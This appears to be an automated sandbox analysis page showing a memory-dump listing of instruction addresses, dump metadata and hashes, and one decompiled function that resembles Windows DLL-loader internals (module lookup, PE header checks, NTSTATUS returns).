0x01410dec
0x01410dee
0x01410df3
0x01410ebf
0x01410ec0
0x00000000
0x01410df9
0x01410df9
0x01410e1e
0x01410e21
0x01410e24
0x01410e27
0x01410e2a
0x01410e2d
0x01410e30
0x01410e36
0x01411040
0x01411043
0x01411049
0x01411049
0x01410e3c
0x01410e3f
0x01411007
0x0141100a
0x01411010
0x01411010
0x0141100a
0x01410e3f
0x01410e58
0x01410e5d
0x01411000
0x01410e63
0x01410e63
0x01410e63
0x01410e67
0x01410e69
0x01410e69
0x01410e6d
0x01410e70
0x01410e74
0x01410e76
0x01410e76
0x01410e7a
0x01410e7c
0x01410e7c
0x01410e83
0x01410e86
0x01410e87
0x01410e89
0x01410e8b
0x01410e91
0x01410e00
0x01410e03
0x01410e03
0x01410e07
0x01410e0f
0x00000000
0x00000000
0x00000000
0x00000000
0x01410e0f
0x01410e97
0x01410e9c
0x0141113e
0x01411141
0x01411143
0x01410eb1
0x01410eb1
0x01410eb4
0x01410eb6
0x01411110
0x01411112
0x0146ea25
0x0146ea25
0x01410ec3
0x01410ec3
0x01410ecb
0x014110fe
0x01410ed1
0x01410ed1
0x01410ed1
0x01410ed3
0x01410edb
0x0146ea2d
0x0146ea2f
0x0146ea31
0x00000000
0x00000000
0x00000000
0x00000000
0x0146ea37
0x0146ea37
0x0146ea3a
0x0146ea3e
0x0146ea47
0x0146ea4a
0x0146ea4c
0x0146ea4d
0x0146ea4d
0x0146ea4e
0x0146ea4e
0x0146ea51
0x0146ea52
0x0146ea52
0x00000000
0x01410ee1
0x01410ee1
0x01410ee1
0x01410ee3
0x01410ee3
0x01410ee6
0x01410eec
0x0146ea5b
0x0146ea5d
0x01410ef6
0x01410ef8
0x0146ea6f
0x0146ea6f
0x01410efe
0x01410efe
0x01410f03
0x0146ea7b
0x0146ea7d
0x00000000
0x00000000
0x0146ea83
0x0146ea85
0x00000000
0x00000000
0x0146ea8b
0x0146ea91
0x00000000
0x00000000
0x0146ea97
0x0146ea9a
0x0146eaa0
0x0146eaa2
0x0146eaa2
0x0146eaae
0x0146eab3
0x0146eab6
0x0146eabf
0x0146eaca
0x0146eacd
0x0146ead1
0x0146ead1
0x0146eab8
0x0146eab8
0x0146eab8
0x0146ead2
0x0146ead9
0x01410f0e
0x01410f15
0x01410f17
0x01410f17
0x01410f1e
0x01410f23
0x0146eae1
0x0146eae1
0x01410f38
0x01410f3a
0x01410f3a
0x01410f49
0x01411108
0x01411108
0x01410f5b
0x014110c7
0x014110ca
0x014110cc
0x00000000
0x00000000
0x014110dc
0x014110de
0x00000000
0x00000000
0x00000000
0x01410f61
0x01410f61
0x01410f61
0x01410f67
0x01410f6b
0x0141111d
0x0141111d
0x01410f75
0x01410f77
0x01410f77
0x01410f85
0x01410f8b
0x014110b9
0x014110bc
0x0146eae9
0x0146eae9
0x01410f91
0x01410f91
0x01410f91
0x01410f96
0x01410f98
0x01410f9a
0x01410f9a
0x01410fa6
0x0141107c
0x0141107f
0x0141108d
0x00000000
0x0141108d
0x01411081
0x01411087
0x0146eaf4
0x0146eafa
0x00000000
0x00000000
0x00000000
0x0146eb00
0x00000000
0x01410fac
0x01410fac
0x00000000
0x01410fac
0x01410fa6
0x01410f5b
0x01410f09
0x01410f09
0x00000000
0x01410f09
0x0146ea63
0x00000000
0x0146ea63
0x01410ef4
0x00000000
0x00000000
0x00000000
0x01410ef4
0x01410ebc
0x01410ebc
0x00000000
0x01410ebc
0x01410eb6
0x01411149
0x0141114c
0x0141114d
0x00000000
0x0141114d
0x01410ea4
0x01410ea7
0x00000000
0x00000000
0x00000000
0x00000000
0x01410fb7
0x01410fb7
0x01410fbc
0x01410fc9
0x01410fc9
0x01410fce
0x01411020
0x01411025
0x01411094
0x01411094
0x01411099
0x0146ea04
0x0146ea04
0x0146ea09
0x0146ea1c
0x0146ea0b
0x0146ea0b
0x0146ea0e
0x0146ea14
0x0146ea14
0x0146ea0e
0x0146ea09
0x01411027
0x01411027
0x01411155
0x0141102d
0x0141102d
0x0141102d
0x01411032
0x0146e9fc
0x0146e9fc
0x01411032
0x01411027
0x00000000
0x01411025
0x01410fd0
0x0146e9f4
0x00000000
0x0146e9f4
0x01410fd6
0x01410fd9
0x01411059
0x01411059
0x0141105e
0x0146e9ec
0x01411064
0x01411064
0x01411064
0x01411069
0x014110ac
0x0141106b
0x0141106b
0x0141106e
0x01411074
0x01411074
0x0141106e
0x01411069
0x00000000
0x0141105e
0x01410fdb
0x014110a4
0x00000000
0x014110a4
0x01410fe1
0x01410fe4
0x00000000
0x00000000
0x01410fea
0x01410ff1
0x00000000
0x01410ff8
0x00000000
0x00000000
0x0146e9e4
0x00000000
0x00000000
0x01411018
0x00000000
0x00000000
0x01411051
0x00000000
0x00000000
0x00000000
0x00000000
0x01410ff1
0x01410fbe
0x01410fc3
0x00000000
0x00000000
0x00000000
0x01410fc3
0x01410df3
0x0146e9d5
0x0146e9d7
0x01411128
0x01411128
0x0141112b
0x0141112d
0x01411133
0x01411133
0x00000000
0x0141112d
0x00000000
0x0146e9d7
0x01410dc2
0x014110f6
0x01410dd4
0x01410dd7
0x01410dda
0x01410de8
0x01410de9
0x01410de9
0x01410dda
0x00000000
0x01410dc2
0x01410dac
0x01410dae
0x01410db3
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71f75ba0f5db608c851fd7edd0b7d223681172aaeb68b82bebe5a692366096b0
Instruction ID: 408c8fb03df92df42e7df1e52d3cd9b2dd14bcedc2a3217fbab74d6baf23e629
Opcode Fuzzy Hash: 71f75ba0f5db608c851fd7edd0b7d223681172aaeb68b82bebe5a692366096b0
Instruction Fuzzy Hash: 15D1C471E042598BDB28CFADC5953BEBBB1EB44314F14802BE602A77ADD77489C2CB45

Uniqueness

Uniqueness Score: -1.00%

Function 0142D5E0, Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E0142D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x150d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E01426600(0x15052d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1507b9c; // 0x0
							_t281 = L01434620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0145F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1507b90; // 0x772a0000
								if(_t384 == 0) {
									_t353 =  *0x1507b8c; // 0xfb2ab8
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E01432280(_t200, 0x15084d8);
									_t277 =  *0x15085f4; // 0xfb2fa8
									_t351 =  *0x15085f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0xfb2f40
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0142FFB0(_t287, _t353, 0x15084d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0146CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E01426600(0x15052d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E01427926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x150b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0149E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1508472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x150b1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x150b218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E01432280(_t250, 0x15084d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L01453898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0142FFB0(_t293, _t353, 0x15084d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E014537F5(_t353, 0);
																}
																E01450413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E01449B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E014402D6(_t174);
																}
																L014377F0( *0x1507b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0144C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0142EC7F(_t353);
										L014419B8(_t287, 0, _t353, 0);
										_t200 = E0141F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L014377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x150b2f8 |  *0x150b2fc) == 0 || ( *0x150b2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0145B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x150b2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E014C6B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E014C6AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E0142E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L0142EAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E01459730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E0142E9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L01428F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01453C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x0142d5f2
0x0142d5f5
0x0142d5f5
0x0142d5fd
0x0142d600
0x0142d60a
0x0142d60d
0x0142d617
0x0142d61d
0x0142d627
0x0142d62e
0x0142d911
0x0142d913
0x00000000
0x0142d919
0x0142d919
0x0142d919
0x0142d634
0x0142d634
0x0142d634
0x0142d634
0x0142d640
0x0142d8bf
0x00000000
0x0142d646
0x0142d646
0x0142d64d
0x0142d652
0x0147b2fc
0x0147b2fc
0x0147b302
0x0147b33b
0x0147b341
0x00000000
0x0147b304
0x0147b304
0x0147b319
0x0147b31e
0x0147b324
0x0147b326
0x0147b332
0x0147b347
0x0147b34c
0x0147b351
0x0147b35a
0x00000000
0x0147b328
0x0147b328
0x00000000
0x0147b328
0x0147b326
0x0142d658
0x0142d658
0x0142d65b
0x0142d665
0x00000000
0x0142d66b
0x0142d66b
0x0142d66b
0x0142d66b
0x0142d66d
0x0142d672
0x0142d67a
0x00000000
0x00000000
0x0142d680
0x0142d686
0x0142d8ce
0x0142d8d4
0x0142d8dd
0x0142d8e0
0x0142d68c
0x0142d691
0x0142d69d
0x0142d6a2
0x0142d6a7
0x0142d6b0
0x0142d6b5
0x0142d6e0
0x0142d6b7
0x0142d6b7
0x0142d6b9
0x0142d6b9
0x0142d6bb
0x0142d6bd
0x0142d6ce
0x0142d6d0
0x0142d6d2
0x0147b363
0x0147b365
0x00000000
0x0147b36b
0x00000000
0x0147b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0142d6bf
0x0142d6bf
0x0142d6e5
0x0142d6e7
0x0142d6e9
0x0142d6ec
0x0142d6ec
0x0142d6ef
0x0142d6f5
0x0142d6f9
0x0142d6fb
0x0142d6fd
0x0142d701
0x0142d703
0x0142d70a
0x0142d70a
0x0142d701
0x0142d710
0x0142d710
0x0142d6c1
0x0142d6c1
0x0142d6c6
0x0147b36d
0x0147b36f
0x00000000
0x0147b375
0x0147b375
0x0147b375
0x00000000
0x0147b375
0x00000000
0x0142d6cc
0x0142d6d8
0x0142d6d8
0x0142d6d8
0x00000000
0x0142d6c6
0x0142d6bf
0x00000000
0x0142d6da
0x0142d6da
0x0142d716
0x0142d71b
0x0142d720
0x0142d726
0x0142d726
0x0142d72d
0x00000000
0x0142d733
0x0142d739
0x0142d742
0x0142d750
0x0142d758
0x0142d764
0x0142d776
0x0142d77a
0x0142d783
0x0142d928
0x0142d92c
0x0142d93d
0x0142d944
0x0142d94f
0x0142d954
0x0142d956
0x0142d95f
0x0142d961
0x0142d973
0x0142d973
0x0142d956
0x0142d944
0x0142d92c
0x0142d78b
0x0147b394
0x0142d791
0x0142d798
0x0147b3a3
0x0147b3bb
0x0147b3bb
0x0142d7a5
0x0142d866
0x0142d870
0x0142d892
0x0142d898
0x0142d89e
0x0142d8a0
0x0142d8a6
0x0142d8ac
0x0142d8ae
0x0142d8b4
0x0142d8b4
0x0142d8ae
0x0142d7a5
0x0142d78b
0x0142d7b1
0x0147b3c5
0x0147b3c5
0x0142d7c3
0x0142d7ca
0x0142d7e5
0x0142d7eb
0x0142d8eb
0x0142d8ed
0x00000000
0x0142d8f3
0x0142d8f3
0x0142d8f3
0x00000000
0x0142d8ed
0x0142d7cc
0x0142d7cc
0x0142d7d2
0x00000000
0x0142d7d4
0x0142d7d4
0x0142d7d7
0x0142d7df
0x0147b3d4
0x0147b3d9
0x0147b3dc
0x0147b3dc
0x0147b3df
0x0147b3e2
0x0147b468
0x0147b46d
0x0147b46f
0x0147b46f
0x0147b475
0x0142d8f8
0x0142d8f9
0x0142d8fd
0x0147b3e8
0x0147b3e8
0x0147b3eb
0x0147b3ed
0x00000000
0x0147b3ef
0x0147b3ef
0x0147b3f1
0x0147b3f4
0x0147b3fe
0x0147b404
0x0147b409
0x0147b40e
0x0147b410
0x0147b410
0x0147b414
0x0147b414
0x0147b41b
0x0147b420
0x0147b423
0x0147b425
0x0147b427
0x0147b42a
0x0147b42d
0x0147b42d
0x0147b42a
0x0147b432
0x0147b436
0x0147b438
0x0147b43b
0x0147b43b
0x0147b449
0x0147b44e
0x0147b454
0x0147b458
0x0147b458
0x0147b45d
0x00000000
0x0147b45d
0x0147b3ed
0x00000000
0x00000000
0x00000000
0x0142d7df
0x0142d7d2
0x0142d7ca
0x0147b37c
0x0147b37e
0x0147b385
0x0147b38a
0x00000000
0x0147b38a
0x0142d742
0x0142d7f1
0x0142d7f8
0x0147b49b
0x0147b49b
0x0142d800
0x0142d837
0x0142d843
0x0142d845
0x0142d847
0x0142d84a
0x0142d84b
0x0142d84e
0x0142d857
0x0142d818
0x0142d824
0x0142d831
0x0147b4a5
0x0147b4ab
0x0147b4b3
0x0147b4b8
0x0147b4bb
0x00000000
0x0147b4c1
0x0147b4c1
0x0147b4c8
0x00000000
0x0147b4ce
0x0147b4d4
0x0147b4e1
0x0147b4e3
0x0147b4e5
0x00000000
0x0147b4eb
0x0147b4f0
0x0147b4f2
0x0142dac9
0x0142dacc
0x0142dacf
0x0142dad1
0x0142dd78
0x0142dd78
0x0142dcf2
0x00000000
0x0142dad7
0x0142dad9
0x0142dadb
0x00000000
0x00000000
0x0142dae1
0x0142dae1
0x0142dae4
0x0142dae6
0x0147b4f9
0x0147b4f9
0x0147b500
0x0142daec
0x0142daec
0x0142daf5
0x0142daf8
0x0142dafb
0x0142db03
0x0142db11
0x0142db16
0x0142db19
0x0142db1b
0x0147b52c
0x0147b531
0x0147b534
0x0142db21
0x0142db21
0x0142db24
0x0142dcd9
0x0142dce2
0x0142dce5
0x0142dd6a
0x0142dd6d
0x00000000
0x0142dd73
0x0147b51a
0x0147b51c
0x0147b51f
0x0147b524
0x00000000
0x0147b524
0x0142dce7
0x0142dce7
0x0142dce7
0x00000000
0x0142dce7
0x00000000
0x0142db2a
0x0142db2c
0x0142db31
0x0142db33
0x0142db36
0x0142db39
0x0142db3b
0x0142db66
0x0142db66
0x0142db3d
0x0142db3d
0x0142db3e
0x0142db46
0x0142db47
0x0142db49
0x0142db4c
0x0142db53
0x0142db55
0x0142db58
0x0142db5a
0x0147b50a
0x0147b50f
0x0147b512
0x0142db60
0x0142db60
0x0142db63
0x0142db63
0x00000000
0x0142db63
0x0142db5a
0x0142db3b
0x0142db24
0x0142db69
0x0142db69
0x0142db6c
0x0142db6f
0x0142db74
0x0147b557
0x0147b557
0x0147b55e
0x0142db7a
0x0142db7c
0x0142db7f
0x0142db82
0x0142db85
0x00000000
0x0142db8b
0x0142db8b
0x0142db8d
0x0142db9b
0x0142db9b
0x0142db9d
0x0142dba0
0x0142dba2
0x0142dba4
0x0142dba7
0x0142dba9
0x0142dbae
0x0142dbae
0x0142dbb1
0x0142dbb4
0x0142dbb4
0x0142dbb7
0x0142dbba
0x0142dcd2
0x0142dcd4
0x00000000
0x0142dbc0
0x0142dbc0
0x0142dbd2
0x0142dbd7
0x0142dbda
0x0142dbdd
0x0142dbdf
0x00000000
0x0142dbe5
0x0142dbe5
0x0142dbee
0x0142dbf1
0x0147b541
0x0147b544
0x00000000
0x0147b546
0x0147b546
0x00000000
0x0147b546
0x0142dbf7
0x0142dbf7
0x0142dbfd
0x0142dbfd
0x0142dbff
0x0142dc0b
0x0142dc15
0x0142dc1b
0x0142dc1d
0x0142dc21
0x0142dc21
0x0142dc23
0x0142dc23
0x0142dc26
0x0142dc29
0x0142dc2b
0x00000000
0x00000000
0x0142dc31
0x0142dc34
0x0142dc36
0x0142dcbf
0x0142dcbf
0x0142dcc2
0x00000000
0x0142dc3c
0x0142dc41
